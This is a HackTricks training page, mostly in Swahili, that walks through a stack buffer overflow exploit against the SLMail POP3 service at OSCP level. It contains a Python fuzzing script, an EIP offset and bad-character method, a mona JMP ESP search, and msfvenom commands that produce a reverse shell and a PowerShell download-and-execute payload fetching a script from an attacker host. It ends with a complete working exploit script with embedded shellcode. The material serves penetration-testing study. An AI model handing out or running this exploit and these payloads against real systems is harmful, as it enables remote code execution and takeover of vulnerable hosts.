Windows Exploiting (Mwongozo wa Msingi - OSCP lvl)

Tip

Jifunze na fanya mazoezi ya AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Jifunze na fanya mazoezi ya GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE) Jifunze na fanya mazoezi ya Azure Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Support HackTricks

Tip

Unatafuta post-OSCP kernel primitives? Modern registry hive corruption chains kwa deterministic SYSTEM shells zimetajwa hapa:

Windows Registry Hive Exploitation

Anza kusakinisha SLMail service

Anzisha upya SLMail service

Kila wakati unahitaji kuzindua upya SLMail service unaweza kufanya hivyo kwa kutumia Windows console:

net start slmail

Kiolezo rahisi kabisa cha python exploit

#!/usr/bin/python

import socket

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
ip = '10.11.25.153'
port = 110

buffer = 'A' * 2700
try:
print "\nLaunching exploit..."
s.connect((ip, port))
data = s.recv(1024)
s.send('USER username' +'\r\n')
data = s.recv(1024)
s.send('PASS ' + buffer + '\r\n')
print "\nFinished!."
except:
print "Could not connect to "+ip+":"+port

Badilisha Fonti ya Immunity Debugger

Nenda kwenye Options >> Appearance >> Fonts >> Change(Consolas, Blod, 9) >> OK

Unganisha mchakato kwenye Immunity Debugger:

File –> Attach

Na bonyeza kitufe START

Tuma exploit na angalia kama EIP imeathiriwa:

Kila unapovunja huduma unapaswa kuianzisha upya kama ilivyoelezwa mwanzoni mwa ukurasa huu.

Tengeneza pattern ili kubadilisha EIP

Pattern inapaswa kuwa kubwa kama buffer uliotumika kuvunja service hapo awali.

/usr/share/metasploit-framework/tools/exploit/pattern_create.rb -l 3000

Badilisha buffer ya exploit, weka pattern kisha anzisha exploit.

Crash mpya inapaswa kuonekana, lakini na anwani tofauti ya EIP:

Angalia kama anwani ilikuwa katika pattern yako:

/usr/share/metasploit-framework/tools/exploit/pattern_offset.rb -l 3000 -q 39694438

Inaonekana tunaweza kubadilisha EIP katika offset 2606 ya buffer.

Angalia kwa kubadilisha buffer ya exploit:

buffer = 'A'*2606 + 'BBBB' + 'CCCC'

Kwa buffer hii, EIP iliyovunjika inapaswa kuonyesha 42424242 (“BBBB”)

Inaonekana inafanya kazi.

Angalia nafasi ya Shellcode ndani ya stack

600B inapaswa kutosha kwa Shellcode yoyote yenye nguvu.

Wacha tubadilishe buffer:

buffer = 'A'*2606 + 'BBBB' + 'C'*600

anzisha exploit mpya na angalia EBP na urefu wa shellcode muhimu

Unaweza kuona kwamba wakati vulnerability inafikiwa, EBP inaelekeza kwa shellcode na kwamba tuna nafasi nyingi za kuweka shellcode hapa.

Katika kesi hii tuna kutoka 0x0209A128 hadi 0x0209A2D6 = 430B. Inatosha.

Angalia bad chars

Badili tena buffer:

badchars = (
"\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10"
"\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20"
"\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30"
"\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40"
"\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50"
"\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f\x60"
"\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70"
"\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80"
"\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90"
"\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0"
"\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0"
"\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0"
"\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0"
"\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0"
"\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0"
"\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff"
)
buffer = 'A'*2606 + 'BBBB' + badchars

badchars huanza kutoka 0x01 kwa sababu 0x00 karibu kila mara ni mbaya.

Endelea kuendesha exploit mara kwa mara ukitumia buffer mpya ukifuta chars zilizogundulika kuwa zisizotumika:

Kwa mfano:

Katika kesi hii unaweza kuona kwamba hapaswi kutumia char 0x0A (hakuna kitu kilichohifadhiwa kwenye memory tangu char 0x09).

Katika kesi hii unaweza kuona kwamba char 0x0D inepukwa:

Tafuta JMP ESP kama return address

Using:

!mona modules    #Get protections, look for all false except last one (Dll of SO)

Utataja memory maps. Tafuta baadhi ya DLl ambazo zina:

  • Rebase: False
  • SafeSEH: False
  • ASLR: False
  • NXCompat: False
  • OS Dll: True

Sasa, ndani ya kumbukumbu hii unapaswa kupata baadhi ya JMP ESP bytes; ili kufanya hivyo endesha:

!mona find -s "\xff\xe4" -m name_unsecure.dll # Search for opcodes insie dll space (JMP ESP)
!mona find -s "\xff\xe4" -m slmfc.dll # Example in this case

Kisha, ikiwa anwani imepatikana, chagua ile isiyokuwa na badchar yoyote:

Katika kesi hii, kwa mfano: _0x5f4a358f_

Tengeneza shellcode

msfvenom -p windows/shell_reverse_tcp LHOST=10.11.0.41 LPORT=443 -f c -b '\x00\x0a\x0d'
msfvenom -a x86 --platform Windows -p windows/exec CMD="powershell \"IEX(New-Object Net.webClient).downloadString('http://10.11.0.41/nishang.ps1')\"" -f python -b '\x00\x0a\x0d'

Ikiwa exploit haifanyi kazi lakini inapaswa (unaweza kuona na ImDebg kwamba shellcode imefikiwa), jaribu kuunda shellcodes nyingine (tumia msfvenom kuunda shellcode tofauti kwa vigezo sawa).

Ongeza NOPS kadhaa mwanzoni ya shellcode na itumie pamoja na return address kwa JMP ESP, kisha ukamilishe exploit:

#!/usr/bin/python

import socket

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
ip = '10.11.25.153'
port = 110

shellcode = (
"\xb8\x30\x3f\x27\x0c\xdb\xda\xd9\x74\x24\xf4\x5d\x31\xc9\xb1"
"\x52\x31\x45\x12\x83\xed\xfc\x03\x75\x31\xc5\xf9\x89\xa5\x8b"
"\x02\x71\x36\xec\x8b\x94\x07\x2c\xef\xdd\x38\x9c\x7b\xb3\xb4"
"\x57\x29\x27\x4e\x15\xe6\x48\xe7\x90\xd0\x67\xf8\x89\x21\xe6"
"\x7a\xd0\x75\xc8\x43\x1b\x88\x09\x83\x46\x61\x5b\x5c\x0c\xd4"
"\x4b\xe9\x58\xe5\xe0\xa1\x4d\x6d\x15\x71\x6f\x5c\x88\x09\x36"
"\x7e\x2b\xdd\x42\x37\x33\x02\x6e\x81\xc8\xf0\x04\x10\x18\xc9"
"\xe5\xbf\x65\xe5\x17\xc1\xa2\xc2\xc7\xb4\xda\x30\x75\xcf\x19"
"\x4a\xa1\x5a\xb9\xec\x22\xfc\x65\x0c\xe6\x9b\xee\x02\x43\xef"
"\xa8\x06\x52\x3c\xc3\x33\xdf\xc3\x03\xb2\x9b\xe7\x87\x9e\x78"
"\x89\x9e\x7a\x2e\xb6\xc0\x24\x8f\x12\x8b\xc9\xc4\x2e\xd6\x85"
"\x29\x03\xe8\x55\x26\x14\x9b\x67\xe9\x8e\x33\xc4\x62\x09\xc4"
"\x2b\x59\xed\x5a\xd2\x62\x0e\x73\x11\x36\x5e\xeb\xb0\x37\x35"
"\xeb\x3d\xe2\x9a\xbb\x91\x5d\x5b\x6b\x52\x0e\x33\x61\x5d\x71"
"\x23\x8a\xb7\x1a\xce\x71\x50\x2f\x04\x79\x89\x47\x18\x79\xd8"
"\xcb\x95\x9f\xb0\xe3\xf3\x08\x2d\x9d\x59\xc2\xcc\x62\x74\xaf"
"\xcf\xe9\x7b\x50\x81\x19\xf1\x42\x76\xea\x4c\x38\xd1\xf5\x7a"
"\x54\xbd\x64\xe1\xa4\xc8\x94\xbe\xf3\x9d\x6b\xb7\x91\x33\xd5"
"\x61\x87\xc9\x83\x4a\x03\x16\x70\x54\x8a\xdb\xcc\x72\x9c\x25"
"\xcc\x3e\xc8\xf9\x9b\xe8\xa6\xbf\x75\x5b\x10\x16\x29\x35\xf4"
"\xef\x01\x86\x82\xef\x4f\x70\x6a\x41\x26\xc5\x95\x6e\xae\xc1"
"\xee\x92\x4e\x2d\x25\x17\x7e\x64\x67\x3e\x17\x21\xf2\x02\x7a"
"\xd2\x29\x40\x83\x51\xdb\x39\x70\x49\xae\x3c\x3c\xcd\x43\x4d"
"\x2d\xb8\x63\xe2\x4e\xe9"
)

buffer = 'A' * 2606 + '\x8f\x35\x4a\x5f' + "\x90" * 8 + shellcode
try:
print "\nLaunching exploit..."
s.connect((ip, port))
data = s.recv(1024)
s.send('USER username' +'\r\n')
data = s.recv(1024)
s.send('PASS ' + buffer + '\r\n')
print "\nFinished!."
except:
print "Could not connect to "+ip+":"+port

Warning

Kuna shellcodes ambazo zinaweza kuandika tena wenyewe, kwa hivyo ni muhimu kila wakati kuongeza NOPs chache kabla ya shellcode

Kuboresha shellcode

Ongeza vigezo hivi:

EXITFUNC=thread -e x86/shikata_ga_nai

Tip

Jifunze na fanya mazoezi ya AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Jifunze na fanya mazoezi ya GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE) Jifunze na fanya mazoezi ya Azure Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Support HackTricks